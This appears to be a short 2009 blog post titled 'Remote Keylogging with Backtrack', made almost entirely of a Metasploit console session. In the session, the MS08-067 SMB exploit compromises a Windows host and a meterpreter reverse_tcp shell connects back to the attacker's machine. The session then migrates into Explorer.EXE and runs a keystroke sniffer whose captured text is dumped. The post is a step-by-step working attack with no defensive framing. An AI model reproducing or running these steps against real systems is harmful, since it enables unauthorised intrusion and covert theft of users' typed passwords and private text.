Friday, November 13, 2009

Remote Keylogging with Backtrack

Remote Keylogging

$ msfconsole

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139

msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3

msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened

meterpreter > ps

Process list
============

PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]

meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.

meterpreter > getpid
Current pid: 316

meterpreter > grabdesktop
Trying to hijack the input desktop…

meterpreter > keyscan_start
Starting the keystroke sniffer…

meterpreter > keyscan_dump
Dumping captured keystrokes…


This is a test of the keystroke logger I am typing this inside of notepad.
myLot User Profile